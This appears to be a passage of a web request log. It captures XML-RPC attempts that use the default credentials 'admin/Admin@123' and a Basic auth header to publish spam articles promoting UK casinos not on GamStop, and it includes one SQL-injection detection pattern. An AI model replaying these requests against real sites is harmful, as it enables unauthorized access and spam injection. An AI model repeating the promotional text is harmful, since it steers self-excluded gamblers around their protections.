the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>","POST \/xmlrpc.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36\nhost:47.254.126.238\nauthorization:Basic cm9uaTozWmhJIE9jTUMgQ1VreSA0RFV5IEs4MEcgS0RoeQ==\ncontent-type:text\/xml\ncontent-length:14589\naccept-encoding:identity\n\n<?xml version='1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>"]
["2026-05-16 20:36:04","89.222.112.54","POST","\/xmlrpc.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36","post","select.+(from|limit) >> <?xml version:'1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>","POST 